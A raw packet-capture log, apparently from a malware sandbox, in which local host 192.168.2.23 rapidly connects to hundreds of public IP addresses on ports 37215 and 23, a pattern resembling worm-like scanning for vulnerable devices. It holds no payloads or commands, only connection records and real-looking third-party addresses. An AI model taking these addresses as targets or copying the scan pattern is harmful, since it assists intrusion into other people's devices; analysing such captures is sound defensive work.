                                                          Dec 3, 2024 23:16:46.399482012 CET4059737215192.168.2.23156.138.49.7
                                                          Dec 3, 2024 23:16:46.399482012 CET4059737215192.168.2.2341.9.105.57
                                                          Dec 3, 2024 23:16:46.399485111 CET4059737215192.168.2.23197.200.15.111
                                                          Dec 3, 2024 23:16:46.399490118 CET4059737215192.168.2.2341.13.38.110
                                                          Dec 3, 2024 23:16:46.399502993 CET4059737215192.168.2.23156.0.152.186
                                                          Dec 3, 2024 23:16:46.399504900 CET4059737215192.168.2.2341.212.185.177
                                                          Dec 3, 2024 23:16:46.399513960 CET4059737215192.168.2.23156.105.165.124
                                                          Dec 3, 2024 23:16:46.399514914 CET4059737215192.168.2.23156.28.151.86
                                                          Dec 3, 2024 23:16:46.399514914 CET4059737215192.168.2.23156.76.226.5
                                                          Dec 3, 2024 23:16:46.399516106 CET4059737215192.168.2.2341.181.148.37
                                                          Dec 3, 2024 23:16:46.399532080 CET4059737215192.168.2.23156.49.71.241
                                                          Dec 3, 2024 23:16:46.399537086 CET4059737215192.168.2.2341.63.111.125
                                                          Dec 3, 2024 23:16:46.399539948 CET4059737215192.168.2.23156.251.243.67
                                                          Dec 3, 2024 23:16:46.399544001 CET4059737215192.168.2.2341.159.87.1
                                                          Dec 3, 2024 23:16:46.399559021 CET4059737215192.168.2.2341.46.128.226
                                                          Dec 3, 2024 23:16:46.399559021 CET4059737215192.168.2.2341.134.150.89
                                                          Dec 3, 2024 23:16:46.399573088 CET4059737215192.168.2.23197.74.182.22
                                                          Dec 3, 2024 23:16:46.399575949 CET4059737215192.168.2.2341.112.172.186
                                                          Dec 3, 2024 23:16:46.399590969 CET4059737215192.168.2.23156.236.146.42
                                                          Dec 3, 2024 23:16:46.399595976 CET4059737215192.168.2.23156.83.79.250
                                                          Dec 3, 2024 23:16:46.399612904 CET4059737215192.168.2.2341.183.86.5
                                                          Dec 3, 2024 23:16:46.399615049 CET4059737215192.168.2.2341.221.144.87
                                                          Dec 3, 2024 23:16:46.399615049 CET4059737215192.168.2.2341.117.193.233
                                                          Dec 3, 2024 23:16:46.399621010 CET4059737215192.168.2.23197.168.77.229
                                                          Dec 3, 2024 23:16:46.399646997 CET4059737215192.168.2.23156.47.238.108
                                                          Dec 3, 2024 23:16:46.399648905 CET4059737215192.168.2.2341.74.73.31
                                                          Dec 3, 2024 23:16:46.399648905 CET4059737215192.168.2.23156.119.72.71
                                                          Dec 3, 2024 23:16:46.399655104 CET4059737215192.168.2.23197.31.42.58
                                                          Dec 3, 2024 23:16:46.399657011 CET4059737215192.168.2.2341.49.129.220
                                                          Dec 3, 2024 23:16:46.399661064 CET4059737215192.168.2.23197.173.143.169
                                                          Dec 3, 2024 23:16:46.399665117 CET4059737215192.168.2.23197.40.103.130
                                                          Dec 3, 2024 23:16:46.399665117 CET4059737215192.168.2.23197.105.166.56
                                                          Dec 3, 2024 23:16:46.399676085 CET4059737215192.168.2.2341.149.237.82
                                                          Dec 3, 2024 23:16:46.399682045 CET4059737215192.168.2.2341.145.63.136
                                                          Dec 3, 2024 23:16:46.399699926 CET4059737215192.168.2.2341.82.224.3
                                                          Dec 3, 2024 23:16:46.399699926 CET4059737215192.168.2.23156.103.225.169
                                                          Dec 3, 2024 23:16:46.399713993 CET4059737215192.168.2.2341.230.100.86
                                                          Dec 3, 2024 23:16:46.399722099 CET4059737215192.168.2.23197.103.41.33
                                                          Dec 3, 2024 23:16:46.399723053 CET4059737215192.168.2.23156.38.167.44
                                                          Dec 3, 2024 23:16:46.399723053 CET4059737215192.168.2.23156.117.38.213
                                                          Dec 3, 2024 23:16:46.399723053 CET4059737215192.168.2.23197.9.138.121
                                                          Dec 3, 2024 23:16:46.399723053 CET4059737215192.168.2.23197.185.193.147
                                                          Dec 3, 2024 23:16:46.399723053 CET4059737215192.168.2.2341.231.100.157
                                                          Dec 3, 2024 23:16:46.399729013 CET4059737215192.168.2.23197.169.190.54
                                                          Dec 3, 2024 23:16:46.399729967 CET4059737215192.168.2.2341.237.43.106
                                                          Dec 3, 2024 23:16:46.399734020 CET4059737215192.168.2.2341.229.0.108
                                                          Dec 3, 2024 23:16:46.399753094 CET4059737215192.168.2.23156.185.125.204
                                                          Dec 3, 2024 23:16:46.399754047 CET4059737215192.168.2.23156.44.240.135
                                                          Dec 3, 2024 23:16:46.399754047 CET4059737215192.168.2.2341.95.107.182
                                                          Dec 3, 2024 23:16:46.399765968 CET4059737215192.168.2.2341.156.177.193
                                                          Dec 3, 2024 23:16:46.399786949 CET4059737215192.168.2.2341.183.19.106
                                                          Dec 3, 2024 23:16:46.399789095 CET4059737215192.168.2.23197.103.197.119
                                                          Dec 3, 2024 23:16:46.399789095 CET4059737215192.168.2.23197.165.213.196
                                                          Dec 3, 2024 23:16:46.399794102 CET4059737215192.168.2.23156.103.247.28
                                                          Dec 3, 2024 23:16:46.399796009 CET5255223192.168.2.23130.155.72.191
                                                          Dec 3, 2024 23:16:46.399796963 CET4059737215192.168.2.23156.194.46.215
                                                          Dec 3, 2024 23:16:46.399806976 CET4059737215192.168.2.23156.203.90.243
                                                          Dec 3, 2024 23:16:46.399812937 CET4059737215192.168.2.23197.71.171.1
                                                          Dec 3, 2024 23:16:46.399818897 CET4059737215192.168.2.2341.207.80.39
                                                          Dec 3, 2024 23:16:46.399831057 CET4059737215192.168.2.23156.94.40.53
                                                          Dec 3, 2024 23:16:46.399831057 CET4059737215192.168.2.23197.194.155.251
                                                          Dec 3, 2024 23:16:46.399836063 CET4059737215192.168.2.2341.223.2.243
                                                          Dec 3, 2024 23:16:46.399844885 CET4059737215192.168.2.23197.180.65.6
                                                          Dec 3, 2024 23:16:46.399859905 CET4059737215192.168.2.23156.125.83.14
                                                          Dec 3, 2024 23:16:46.399861097 CET4059737215192.168.2.2341.233.47.214
                                                          Dec 3, 2024 23:16:46.399880886 CET4059737215192.168.2.23156.83.70.203
                                                          Dec 3, 2024 23:16:46.399880886 CET4059737215192.168.2.23197.146.238.43
                                                          Dec 3, 2024 23:16:46.399884939 CET4059737215192.168.2.23156.192.55.111
                                                          Dec 3, 2024 23:16:46.399890900 CET4059737215192.168.2.2341.58.216.98
                                                          Dec 3, 2024 23:16:46.399892092 CET4059737215192.168.2.2341.6.253.1
                                                          Dec 3, 2024 23:16:46.399909019 CET4059737215192.168.2.23197.99.229.64
                                                          Dec 3, 2024 23:16:46.399910927 CET4059737215192.168.2.23197.115.104.140
                                                          Dec 3, 2024 23:16:46.399916887 CET4059737215192.168.2.23197.200.179.130
                                                          Dec 3, 2024 23:16:46.399918079 CET4059737215192.168.2.23156.186.16.119
                                                          Dec 3, 2024 23:16:46.399933100 CET4059737215192.168.2.23197.93.74.85
                                                          Dec 3, 2024 23:16:46.399940014 CET4059737215192.168.2.23156.12.172.162
                                                          Dec 3, 2024 23:16:46.399950981 CET4059737215192.168.2.23197.42.103.189
                                                          Dec 3, 2024 23:16:46.399955988 CET4059737215192.168.2.23156.172.113.193
                                                          Dec 3, 2024 23:16:46.399960995 CET4059737215192.168.2.23197.71.22.178
                                                          Dec 3, 2024 23:16:46.399960995 CET4059737215192.168.2.23156.248.19.9
                                                          Dec 3, 2024 23:16:46.399977922 CET4059737215192.168.2.23156.15.188.143
                                                          Dec 3, 2024 23:16:46.399979115 CET4059737215192.168.2.23197.5.183.163
                                                          Dec 3, 2024 23:16:46.399980068 CET4059737215192.168.2.2341.46.63.90
                                                          Dec 3, 2024 23:16:46.399981022 CET4059737215192.168.2.23197.42.111.199
                                                          Dec 3, 2024 23:16:46.399996042 CET4059737215192.168.2.23156.35.21.74
                                                          Dec 3, 2024 23:16:46.399996996 CET4059737215192.168.2.2341.11.255.89
                                                          Dec 3, 2024 23:16:46.400017977 CET4059737215192.168.2.23156.5.85.252
                                                          Dec 3, 2024 23:16:46.400021076 CET4059737215192.168.2.23156.62.202.10
                                                          Dec 3, 2024 23:16:46.400021076 CET4059737215192.168.2.2341.14.216.189
                                                          Dec 3, 2024 23:16:46.400028944 CET4059737215192.168.2.2341.225.1.59
                                                          Dec 3, 2024 23:16:46.400041103 CET4059737215192.168.2.23156.81.30.37
                                                          Dec 3, 2024 23:16:46.400048971 CET4059737215192.168.2.2341.78.128.165
                                                          Dec 3, 2024 23:16:46.400048971 CET4059737215192.168.2.23156.209.237.66
                                                          Dec 3, 2024 23:16:46.400051117 CET4059737215192.168.2.2341.72.87.84
                                                          Dec 3, 2024 23:16:46.400063038 CET4059737215192.168.2.23197.40.72.7
                                                          Dec 3, 2024 23:16:46.400067091 CET4059737215192.168.2.2341.126.15.74
                                                          Dec 3, 2024 23:16:46.400082111 CET4059737215192.168.2.2341.110.109.204
                                                          Dec 3, 2024 23:16:46.400087118 CET4059737215192.168.2.23197.119.216.193
                                                          Dec 3, 2024 23:16:46.400088072 CET4059737215192.168.2.23197.133.43.212
                                                          Dec 3, 2024 23:16:46.400088072 CET4059737215192.168.2.23197.141.58.151
                                                          Dec 3, 2024 23:16:46.400090933 CET4059737215192.168.2.2341.127.67.236
                                                          Dec 3, 2024 23:16:46.400109053 CET4059737215192.168.2.23197.141.163.149
                                                          Dec 3, 2024 23:16:46.400109053 CET4059737215192.168.2.23156.153.123.84
                                                          Dec 3, 2024 23:16:46.400114059 CET4059737215192.168.2.23156.190.13.144
                                                          Dec 3, 2024 23:16:46.400114059 CET4059737215192.168.2.23156.92.80.52
                                                          Dec 3, 2024 23:16:46.400151014 CET4059737215192.168.2.23156.141.154.16
                                                          Dec 3, 2024 23:16:46.400155067 CET4059737215192.168.2.2341.86.100.163
                                                          Dec 3, 2024 23:16:46.400156975 CET4059737215192.168.2.23156.43.230.221
                                                          Dec 3, 2024 23:16:46.400160074 CET4059737215192.168.2.23197.119.34.150
                                                          Dec 3, 2024 23:16:46.400160074 CET4059737215192.168.2.23197.99.20.156
                                                          Dec 3, 2024 23:16:46.400160074 CET4059737215192.168.2.2341.118.175.135
                                                          Dec 3, 2024 23:16:46.400161982 CET4059737215192.168.2.23197.112.28.249
                                                          Dec 3, 2024 23:16:46.400180101 CET4059737215192.168.2.23156.162.8.57
                                                          Dec 3, 2024 23:16:46.400182009 CET4059737215192.168.2.23156.123.109.221
                                                          Dec 3, 2024 23:16:46.400187969 CET4059737215192.168.2.23156.98.80.164
                                                          Dec 3, 2024 23:16:46.400187969 CET4059737215192.168.2.2341.47.253.89
                                                          Dec 3, 2024 23:16:46.400190115 CET4059737215192.168.2.2341.84.134.243
                                                          Dec 3, 2024 23:16:46.400190115 CET4059737215192.168.2.23197.143.165.179
                                                          Dec 3, 2024 23:16:46.400191069 CET4059737215192.168.2.2341.63.247.214
                                                          Dec 3, 2024 23:16:46.400190115 CET4059737215192.168.2.2341.26.34.220
                                                          Dec 3, 2024 23:16:46.400191069 CET4059737215192.168.2.2341.30.241.134
                                                          Dec 3, 2024 23:16:46.400201082 CET4059737215192.168.2.2341.92.45.195
                                                          Dec 3, 2024 23:16:46.400209904 CET4059737215192.168.2.23197.51.30.159
                                                          Dec 3, 2024 23:16:46.400212049 CET4059737215192.168.2.23156.88.118.209
                                                          Dec 3, 2024 23:16:46.400213957 CET4059737215192.168.2.23197.96.132.77
                                                          Dec 3, 2024 23:16:46.400218010 CET4059737215192.168.2.2341.36.3.211
                                                          Dec 3, 2024 23:16:46.400228977 CET4059737215192.168.2.2341.31.202.232
                                                          Dec 3, 2024 23:16:46.400228977 CET4059737215192.168.2.23156.192.17.4
                                                          Dec 3, 2024 23:16:46.400245905 CET4059737215192.168.2.2341.70.231.48
                                                          Dec 3, 2024 23:16:46.400255919 CET4059737215192.168.2.2341.155.251.182
                                                          Dec 3, 2024 23:16:46.400262117 CET4059737215192.168.2.2341.95.56.65
                                                          Dec 3, 2024 23:16:46.400275946 CET4059737215192.168.2.23197.227.5.49
                                                          Dec 3, 2024 23:16:46.400278091 CET4059737215192.168.2.23156.98.206.219
                                                          Dec 3, 2024 23:16:46.400279045 CET4059737215192.168.2.23156.161.191.205
                                                          Dec 3, 2024 23:16:46.400285959 CET4059737215192.168.2.23197.156.164.215
                                                          Dec 3, 2024 23:16:46.400286913 CET4059737215192.168.2.23197.6.82.124
                                                          Dec 3, 2024 23:16:46.400299072 CET4059737215192.168.2.23156.104.13.65
                                                          Dec 3, 2024 23:16:46.400310040 CET4059737215192.168.2.2341.26.217.255
                                                          Dec 3, 2024 23:16:46.400327921 CET4059737215192.168.2.23197.145.177.81
                                                          Dec 3, 2024 23:16:46.400330067 CET4059737215192.168.2.23197.18.147.227
                                                          Dec 3, 2024 23:16:46.400338888 CET4059737215192.168.2.23156.183.55.193
                                                          Dec 3, 2024 23:16:46.400346994 CET5583423192.168.2.23101.213.242.48
                                                          Dec 3, 2024 23:16:46.400351048 CET4059737215192.168.2.23156.171.123.132
                                                          Dec 3, 2024 23:16:46.400353909 CET4059737215192.168.2.23156.184.115.137
                                                          Dec 3, 2024 23:16:46.400355101 CET4059737215192.168.2.23156.243.119.79
                                                          Dec 3, 2024 23:16:46.400356054 CET4059737215192.168.2.23156.148.194.49
                                                          Dec 3, 2024 23:16:46.400356054 CET4059737215192.168.2.23197.108.194.97
                                                          Dec 3, 2024 23:16:46.400357962 CET4059737215192.168.2.2341.159.54.226
                                                          Dec 3, 2024 23:16:46.400372982 CET4059737215192.168.2.23197.58.44.5
                                                          Dec 3, 2024 23:16:46.400381088 CET4059737215192.168.2.23197.50.178.61
                                                          Dec 3, 2024 23:16:46.400384903 CET4059737215192.168.2.23156.140.88.90
                                                          Dec 3, 2024 23:16:46.400394917 CET4059737215192.168.2.23156.10.215.120
                                                          Dec 3, 2024 23:16:46.400418997 CET4059737215192.168.2.23156.52.14.114
                                                          Dec 3, 2024 23:16:46.400418997 CET4059737215192.168.2.23197.14.165.165
                                                          Dec 3, 2024 23:16:46.400437117 CET4059737215192.168.2.23156.154.56.113
                                                          Dec 3, 2024 23:16:46.400437117 CET4059737215192.168.2.23197.47.129.94
                                                          Dec 3, 2024 23:16:46.400437117 CET4059737215192.168.2.2341.251.130.246
                                                          Dec 3, 2024 23:16:46.400445938 CET4059737215192.168.2.2341.236.35.78
                                                          Dec 3, 2024 23:16:46.400461912 CET4059737215192.168.2.2341.193.188.118
                                                          Dec 3, 2024 23:16:46.400468111 CET4059737215192.168.2.23197.20.16.11
                                                          Dec 3, 2024 23:16:46.400490046 CET4059737215192.168.2.2341.141.124.205
                                                          Dec 3, 2024 23:16:46.400490999 CET4059737215192.168.2.23197.108.207.18
                                                          Dec 3, 2024 23:16:46.400505066 CET4059737215192.168.2.23197.62.71.91
                                                          Dec 3, 2024 23:16:46.400509119 CET4059737215192.168.2.23156.32.204.13
                                                          Dec 3, 2024 23:16:46.400516033 CET4059737215192.168.2.23197.196.252.123
                                                          Dec 3, 2024 23:16:46.400517941 CET4059737215192.168.2.2341.7.172.184
                                                          Dec 3, 2024 23:16:46.400518894 CET4059737215192.168.2.2341.205.167.97
                                                          Dec 3, 2024 23:16:46.400537014 CET4059737215192.168.2.2341.176.183.186
                                                          Dec 3, 2024 23:16:46.400538921 CET4059737215192.168.2.2341.26.153.32
                                                          Dec 3, 2024 23:16:46.400541067 CET4059737215192.168.2.23197.227.167.23
                                                          Dec 3, 2024 23:16:46.400557041 CET4059737215192.168.2.2341.209.91.212
                                                          Dec 3, 2024 23:16:46.400558949 CET4059737215192.168.2.23197.187.127.31
                                                          Dec 3, 2024 23:16:46.400568962 CET4059737215192.168.2.23197.35.162.190
                                                          Dec 3, 2024 23:16:46.400574923 CET4059737215192.168.2.23156.190.70.44
                                                          Dec 3, 2024 23:16:46.400576115 CET4059737215192.168.2.2341.85.206.233
                                                          Dec 3, 2024 23:16:46.400587082 CET4059737215192.168.2.23156.76.95.5
                                                          Dec 3, 2024 23:16:46.400598049 CET4059737215192.168.2.23156.171.1.193
                                                          Dec 3, 2024 23:16:46.400599957 CET4059737215192.168.2.23197.194.77.45
                                                          Dec 3, 2024 23:16:46.400607109 CET4059737215192.168.2.23156.6.190.236
                                                          Dec 3, 2024 23:16:46.400882006 CET4760223192.168.2.2337.234.78.188
                                                          Dec 3, 2024 23:16:46.401366949 CET5727637215192.168.2.23156.124.55.110
                                                          Dec 3, 2024 23:16:46.402137041 CET5772823192.168.2.23184.224.131.118
                                                          Dec 3, 2024 23:16:46.402656078 CET4513423192.168.2.23218.100.158.146
                                                          Dec 3, 2024 23:16:46.403175116 CET3918623192.168.2.23222.64.76.248
                                                          Dec 3, 2024 23:16:46.403709888 CET6005623192.168.2.23185.167.174.148
                                                          Dec 3, 2024 23:16:46.404254913 CET3491423192.168.2.2365.30.3.19
                                                          Dec 3, 2024 23:16:46.404896021 CET5271223192.168.2.23147.189.3.230
                                                          Dec 3, 2024 23:16:46.405432940 CET3573623192.168.2.23206.68.214.163
                                                          Dec 3, 2024 23:16:46.405946970 CET3710623192.168.2.2327.234.229.218
                                                          Dec 3, 2024 23:16:46.406467915 CET5929823192.168.2.23112.229.253.40
                                                          Dec 3, 2024 23:16:46.406994104 CET5145623192.168.2.23119.96.49.132
                                                          Dec 3, 2024 23:16:46.407524109 CET4108423192.168.2.23218.67.132.144
                                                          Dec 3, 2024 23:16:46.408068895 CET3844823192.168.2.2374.223.132.58
                                                          Dec 3, 2024 23:16:46.408595085 CET4121423192.168.2.23121.30.192.117
                                                          Dec 3, 2024 23:16:46.409118891 CET3803423192.168.2.2331.46.27.143
                                                          Dec 3, 2024 23:16:46.409638882 CET4100823192.168.2.2347.7.97.197
                                                          Dec 3, 2024 23:16:46.410151005 CET4962623192.168.2.2323.144.252.12
                                                          Dec 3, 2024 23:16:46.410672903 CET5642623192.168.2.2350.131.41.104
                                                          Dec 3, 2024 23:16:46.411189079 CET4595023192.168.2.23140.78.178.135
                                                          Dec 3, 2024 23:16:46.411720037 CET4625423192.168.2.23203.97.157.134
                                                          Dec 3, 2024 23:16:46.412224054 CET4866023192.168.2.2396.243.144.211
                                                          Dec 3, 2024 23:16:46.412761927 CET5002823192.168.2.23115.214.33.197
                                                          Dec 3, 2024 23:16:46.413265944 CET4923823192.168.2.2332.14.25.100
                                                          Dec 3, 2024 23:16:46.413774014 CET5765823192.168.2.23185.71.85.214
                                                          Dec 3, 2024 23:16:46.414300919 CET3714223192.168.2.23139.153.60.41
                                                          Dec 3, 2024 23:16:46.414817095 CET4012023192.168.2.2327.84.10.92
                                                          Dec 3, 2024 23:16:46.415338993 CET3757023192.168.2.23140.76.10.211
                                                          Dec 3, 2024 23:16:46.415878057 CET3313023192.168.2.23105.187.135.120
                                                          Dec 3, 2024 23:16:46.416388988 CET5109823192.168.2.23185.231.81.163
                                                          Dec 3, 2024 23:16:46.416913986 CET3794623192.168.2.23135.43.117.122
                                                          Dec 3, 2024 23:16:46.417449951 CET4369223192.168.2.23221.198.169.88
                                                          Dec 3, 2024 23:16:46.417979002 CET5474223192.168.2.2342.51.5.44
                                                          Dec 3, 2024 23:16:46.418488026 CET3963223192.168.2.231.139.194.233
                                                          Dec 3, 2024 23:16:46.419024944 CET5046023192.168.2.23217.31.44.89
                                                          Dec 3, 2024 23:16:46.419538021 CET5240823192.168.2.23196.250.179.4
                                                          Dec 3, 2024 23:16:46.420054913 CET4255223192.168.2.239.231.222.167
                                                          Dec 3, 2024 23:16:46.420578957 CET3582423192.168.2.2354.163.87.119
                                                          Dec 3, 2024 23:16:46.421088934 CET5507223192.168.2.2385.112.26.149
                                                          Dec 3, 2024 23:16:46.421606064 CET3723423192.168.2.23174.240.221.105
                                                          Dec 3, 2024 23:16:46.435982943 CET6085223192.168.2.23213.83.187.7
                                                          Dec 3, 2024 23:16:46.436501026 CET5485023192.168.2.23125.169.157.239
                                                          Dec 3, 2024 23:16:46.437032938 CET4392823192.168.2.23166.127.178.91
                                                          Dec 3, 2024 23:16:46.437540054 CET5537423192.168.2.2331.226.180.43
                                                          Dec 3, 2024 23:16:46.438050985 CET5627623192.168.2.23108.129.32.48
                                                          Dec 3, 2024 23:16:46.438574076 CET4552423192.168.2.23104.133.85.82
                                                          Dec 3, 2024 23:16:46.511676073 CET234060250.186.10.186192.168.2.23
                                                          Dec 3, 2024 23:16:46.511728048 CET2340602123.181.30.99192.168.2.23
                                                          Dec 3, 2024 23:16:46.511737108 CET234060247.117.159.86192.168.2.23
                                                          Dec 3, 2024 23:16:46.511745930 CET2340602223.96.186.59192.168.2.23
                                                          Dec 3, 2024 23:16:46.511746883 CET4060223192.168.2.2350.186.10.186
                                                          Dec 3, 2024 23:16:46.511755943 CET2340602199.238.183.81192.168.2.23
                                                          Dec 3, 2024 23:16:46.511780024 CET2340602123.252.231.217192.168.2.23
                                                          Dec 3, 2024 23:16:46.511780024 CET4060223192.168.2.23123.181.30.99
                                                          Dec 3, 2024 23:16:46.511784077 CET4060223192.168.2.23223.96.186.59
                                                          Dec 3, 2024 23:16:46.511784077 CET4060223192.168.2.2347.117.159.86
                                                          Dec 3, 2024 23:16:46.511787891 CET4060223192.168.2.23199.238.183.81
                                                          Dec 3, 2024 23:16:46.511795044 CET2340602147.242.5.133192.168.2.23
                                                          Dec 3, 2024 23:16:46.511810064 CET4060223192.168.2.23123.252.231.217
                                                          Dec 3, 2024 23:16:46.511832952 CET4060223192.168.2.23147.242.5.133
                                                          Dec 3, 2024 23:16:46.511848927 CET2340602108.44.48.114192.168.2.23
                                                          Dec 3, 2024 23:16:46.511858940 CET2340602161.152.46.196192.168.2.23
                                                          Dec 3, 2024 23:16:46.511868000 CET2340602198.189.113.143192.168.2.23
                                                          Dec 3, 2024 23:16:46.511884928 CET4060223192.168.2.23108.44.48.114
                                                          Dec 3, 2024 23:16:46.511888027 CET4060223192.168.2.23161.152.46.196
                                                          Dec 3, 2024 23:16:46.511895895 CET4060223192.168.2.23198.189.113.143
                                                          Dec 3, 2024 23:16:46.511903048 CET234060240.109.90.228192.168.2.23
                                                          Dec 3, 2024 23:16:46.511914015 CET2340602150.173.229.11192.168.2.23
                                                          Dec 3, 2024 23:16:46.511921883 CET2340602158.85.95.150192.168.2.23
                                                          Dec 3, 2024 23:16:46.511938095 CET4060223192.168.2.2340.109.90.228
                                                          Dec 3, 2024 23:16:46.511944056 CET4060223192.168.2.23150.173.229.11
                                                          Dec 3, 2024 23:16:46.511944056 CET4060223192.168.2.23158.85.95.150
                                                          Dec 3, 2024 23:16:46.511950970 CET2340602151.240.39.152192.168.2.23
                                                          Dec 3, 2024 23:16:46.511984110 CET234060251.132.249.56192.168.2.23
                                                          Dec 3, 2024 23:16:46.511993885 CET2340602133.111.104.194192.168.2.23
                                                          Dec 3, 2024 23:16:46.511996031 CET4060223192.168.2.23151.240.39.152
                                                          Dec 3, 2024 23:16:46.512003899 CET234060240.155.36.84192.168.2.23
                                                          Dec 3, 2024 23:16:46.512012959 CET234060282.88.141.198192.168.2.23
                                                          Dec 3, 2024 23:16:46.512015104 CET4060223192.168.2.2351.132.249.56
                                                          Dec 3, 2024 23:16:46.512032032 CET4060223192.168.2.23133.111.104.194
                                                          Dec 3, 2024 23:16:46.512032986 CET4060223192.168.2.2340.155.36.84
                                                          Dec 3, 2024 23:16:46.512046099 CET4060223192.168.2.2382.88.141.198
                                                          Dec 3, 2024 23:16:46.512053967 CET234060282.205.195.109192.168.2.23
                                                          Dec 3, 2024 23:16:46.512084007 CET2340602208.194.164.70192.168.2.23
                                                          Dec 3, 2024 23:16:46.512095928 CET2340602220.222.86.116192.168.2.23
                                                          Dec 3, 2024 23:16:46.512111902 CET4060223192.168.2.2382.205.195.109
                                                          Dec 3, 2024 23:16:46.512113094 CET234060299.183.248.196192.168.2.23
                                                          Dec 3, 2024 23:16:46.512115002 CET4060223192.168.2.23208.194.164.70
                                                          Dec 3, 2024 23:16:46.512125015 CET234060257.17.77.51192.168.2.23
                                                          Dec 3, 2024 23:16:46.512126923 CET4060223192.168.2.23220.222.86.116
                                                          Dec 3, 2024 23:16:46.512135029 CET234060248.92.44.82192.168.2.23
                                                          Dec 3, 2024 23:16:46.512145042 CET2340602205.114.36.151192.168.2.23
                                                          Dec 3, 2024 23:16:46.512155056 CET4060223192.168.2.2399.183.248.196
                                                          Dec 3, 2024 23:16:46.512155056 CET4060223192.168.2.2357.17.77.51
                                                          Dec 3, 2024 23:16:46.512167931 CET4060223192.168.2.23205.114.36.151
                                                          Dec 3, 2024 23:16:46.512168884 CET4060223192.168.2.2348.92.44.82
                                                          Dec 3, 2024 23:16:46.512208939 CET234060223.191.150.65192.168.2.23
                                                          Dec 3, 2024 23:16:46.512218952 CET2340602189.231.50.87192.168.2.23
                                                          Dec 3, 2024 23:16:46.512228012 CET234060264.16.22.181192.168.2.23
                                                          Dec 3, 2024 23:16:46.512237072 CET23406024.181.235.234192.168.2.23
                                                          Dec 3, 2024 23:16:46.512245893 CET2340602206.181.41.37192.168.2.23
                                                          Dec 3, 2024 23:16:46.512247086 CET4060223192.168.2.2323.191.150.65
                                                          Dec 3, 2024 23:16:46.512247086 CET4060223192.168.2.23189.231.50.87
                                                          Dec 3, 2024 23:16:46.512255907 CET2340602178.162.72.43192.168.2.23
                                                          Dec 3, 2024 23:16:46.512260914 CET4060223192.168.2.234.181.235.234
                                                          Dec 3, 2024 23:16:46.512265921 CET4060223192.168.2.2364.16.22.181
                                                          Dec 3, 2024 23:16:46.512267113 CET234060277.112.247.243192.168.2.23
                                                          Dec 3, 2024 23:16:46.512285948 CET234060265.86.58.226192.168.2.23
                                                          Dec 3, 2024 23:16:46.512296915 CET2340602113.40.76.240192.168.2.23
                                                          Dec 3, 2024 23:16:46.512305021 CET4060223192.168.2.2377.112.247.243
                                                          Dec 3, 2024 23:16:46.512305975 CET234060220.206.54.166192.168.2.23
                                                          Dec 3, 2024 23:16:46.512315989 CET2340602183.133.122.5192.168.2.23
                                                          Dec 3, 2024 23:16:46.512320042 CET4060223192.168.2.23206.181.41.37
                                                          Dec 3, 2024 23:16:46.512325048 CET234060253.69.255.214192.168.2.23
                                                          Dec 3, 2024 23:16:46.512325048 CET4060223192.168.2.23178.162.72.43
                                                          Dec 3, 2024 23:16:46.512329102 CET4060223192.168.2.2365.86.58.226
                                                          Dec 3, 2024 23:16:46.512332916 CET4060223192.168.2.23113.40.76.240
                                                          Dec 3, 2024 23:16:46.512332916 CET4060223192.168.2.2320.206.54.166
                                                          Dec 3, 2024 23:16:46.512336969 CET2340602131.79.78.52192.168.2.23
                                                          Dec 3, 2024 23:16:46.512346983 CET4060223192.168.2.23183.133.122.5
                                                          Dec 3, 2024 23:16:46.512347937 CET2340602178.31.253.80192.168.2.23
                                                          Dec 3, 2024 23:16:46.512360096 CET4060223192.168.2.2353.69.255.214
                                                          Dec 3, 2024 23:16:46.512372971 CET4060223192.168.2.23131.79.78.52
                                                          Dec 3, 2024 23:16:46.512379885 CET4060223192.168.2.23178.31.253.80
                                                          Dec 3, 2024 23:16:46.512465000 CET2340602212.140.111.119192.168.2.23
                                                          Dec 3, 2024 23:16:46.512501001 CET4060223192.168.2.23212.140.111.119
                                                          Dec 3, 2024 23:16:46.512525082 CET234060214.3.188.11192.168.2.23
                                                          Dec 3, 2024 23:16:46.512554884 CET2340602199.216.131.248192.168.2.23
                                                          Dec 3, 2024 23:16:46.512564898 CET2340602129.96.32.114192.168.2.23
                                                          Dec 3, 2024 23:16:46.512573004 CET4060223192.168.2.2314.3.188.11
                                                          Dec 3, 2024 23:16:46.512573957 CET23406024.185.189.239192.168.2.23
                                                          Dec 3, 2024 23:16:46.512588978 CET4060223192.168.2.23199.216.131.248
                                                          Dec 3, 2024 23:16:46.512592077 CET4060223192.168.2.23129.96.32.114
                                                          Dec 3, 2024 23:16:46.512609005 CET4060223192.168.2.234.185.189.239
                                                          Dec 3, 2024 23:16:46.512653112 CET2340602163.81.23.79192.168.2.23
                                                          Dec 3, 2024 23:16:46.512670040 CET2340602193.234.170.22192.168.2.23
                                                          Dec 3, 2024 23:16:46.512679100 CET2340602191.103.34.9192.168.2.23
                                                          Dec 3, 2024 23:16:46.512707949 CET4060223192.168.2.23163.81.23.79
                                                          Dec 3, 2024 23:16:46.512712002 CET4060223192.168.2.23193.234.170.22
                                                          Dec 3, 2024 23:16:46.512718916 CET4060223192.168.2.23191.103.34.9
                                                          Dec 3, 2024 23:16:46.512744904 CET234060225.98.126.63192.168.2.23
                                                          Dec 3, 2024 23:16:46.512756109 CET234060293.130.183.12192.168.2.23
                                                          Dec 3, 2024 23:16:46.512763977 CET234060286.71.86.232192.168.2.23
                                                          Dec 3, 2024 23:16:46.512783051 CET4060223192.168.2.2325.98.126.63
                                                          Dec 3, 2024 23:16:46.512783051 CET4060223192.168.2.2393.130.183.12
                                                          Dec 3, 2024 23:16:46.512806892 CET4060223192.168.2.2386.71.86.232
                                                          Dec 3, 2024 23:16:46.515237093 CET2333812153.60.128.113192.168.2.23
                                                          Dec 3, 2024 23:16:46.515285969 CET3381223192.168.2.23153.60.128.113
                                                          Dec 3, 2024 23:16:46.515821934 CET3902423192.168.2.2350.186.10.186
                                                          Dec 3, 2024 23:16:46.516395092 CET4665023192.168.2.23123.181.30.99
                                                          Dec 3, 2024 23:16:46.516937971 CET5329823192.168.2.23223.96.186.59
                                                          Dec 3, 2024 23:16:46.517469883 CET5638623192.168.2.2347.117.159.86
                                                          Dec 3, 2024 23:16:46.518038988 CET4891623192.168.2.23199.238.183.81
                                                          Dec 3, 2024 23:16:46.518548012 CET4987623192.168.2.23123.252.231.217
                                                          Dec 3, 2024 23:16:46.519089937 CET3362423192.168.2.23147.242.5.133
                                                          Dec 3, 2024 23:16:46.519596100 CET5239623192.168.2.23108.44.48.114
                                                          Dec 3, 2024 23:16:46.520123005 CET4760823192.168.2.23161.152.46.196
                                                          Dec 3, 2024 23:16:46.520643950 CET5331623192.168.2.23198.189.113.143
